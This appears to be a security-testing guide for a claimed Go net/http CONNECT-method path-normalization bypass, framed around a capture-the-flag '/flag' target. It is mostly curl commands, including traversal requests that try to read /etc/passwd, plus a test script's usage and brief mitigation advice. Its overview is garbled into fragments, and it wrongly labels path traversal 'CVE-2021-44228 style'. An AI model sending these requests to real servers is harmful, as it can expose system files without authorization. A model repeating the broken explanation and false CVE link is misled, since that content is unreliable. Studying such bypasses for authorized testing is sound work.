GoLang HTTP CONNECT Method Vulnerability

Overview

Go's

net/http

CONNECT

How the Vulnerability Works

Normal Path Behavior

For standard HTTP methods (GET, POST, etc.), Go's HTTP server normalizes paths:

/flag/

/flag

/../flag

/flag

/flag/.

/flag

CONNECT Method Exception

The

CONNECT

• /../flag

  stays as

  /../flag

• /flag/

  stays as

  /flag/

• /flag/.

  stays as

  /flag/.

This bypass can allow access to resources that would otherwise be protected.

Testing Methodology

Step 1: Identify Go-Based Servers

Look for indicators that a server is running Go:

# Check server headers
curl -I http://target.com | grep -i server

# Look for Go-specific headers or response patterns

Step 2: Test Path Normalization

Test if the server normalizes paths with standard methods:

# Test with GET - should normalize
curl -X GET http://target.com/../flag
curl -X GET http://target.com/flag/

# Test with CONNECT - may bypass normalization
curl --path-as-is -X CONNECT http://target.com/../flag

Step 3: Compare Responses

If the CONNECT method returns different content than GET, the vulnerability may be present:

# Save responses for comparison
curl -X GET http://target.com/../flag -o get_response.txt
curl --path-as-is -X CONNECT http://target.com/../flag -o connect_response.txt

# Compare
diff get_response.txt connect_response.txt

Common Test Patterns

Directory Traversal

# Test parent directory access
curl --path-as-is -X CONNECT http://target.com/../../../etc/passwd
curl --path-as-is -X CONNECT http://target.com/..%2f..%2f..%2fetc%2fpasswd

Trailing Slash Variations

# Test trailing slash bypass
curl --path-as-is -X CONNECT http://target.com/flag/
curl --path-as-is -X CONNECT http://target.com/flag/.

Mixed Path Variations

# Test various path encodings
curl --path-as-is -X CONNECT http://target.com/./../flag
curl --path-as-is -X CONNECT http://target.com/flag/./../secret

Automated Testing Script

Use the included

test-connect-vuln.sh

# Basic test
cd scripts
./test-connect-vuln.sh http://target.com

# Test specific paths
./test-connect-vuln.sh http://target.com --paths "/../flag" "/flag/" "/flag/."

# Verbose output
./test-connect-vuln.sh http://target.com --verbose

Mitigation Recommendations

For Developers

1. Validate paths before processing - Don't rely on Go's automatic normalization
2. Use a security library - Consider using libraries that handle path validation
3. Implement custom CONNECT handling - Override default CONNECT behavior if needed
4. Use reverse proxies - Configure nginx or similar to normalize paths before they reach Go

Example Fix Pattern

// Validate and normalize paths manually
func validatePath(path string) string {
    // Clean the path
    cleanPath := filepath.Clean(path)
    
    // Ensure it doesn't escape intended directory
    if strings.HasPrefix(cleanPath, "..") {
        return "" // Reject
    }
    
    return cleanPath
}

Safety Guidelines

⚠️ Important: Only test systems you have explicit authorization to test.

• Get written permission before testing
• Use this skill for educational purposes and authorized security assessments
• Document findings responsibly
• Report vulnerabilities through proper channels

References

• Go HTTP Server Source Code
• Go net/http Package Documentation
• HTTP CONNECT Method RFC

Related Vulnerabilities

This vulnerability is related to:

• Path traversal attacks (CVE-2021-44228 style)
• HTTP method bypass vulnerabilities
• Web server misconfiguration issues

Quick Reference

curl --path-as-is -X CONNECT http://target/../flag

curl -X GET http://target/../flag

curl --path-as-is -X CONNECT http://target/../flag

./test-connect-vuln.sh http://target

./test-connect-vuln.sh http://target --verbose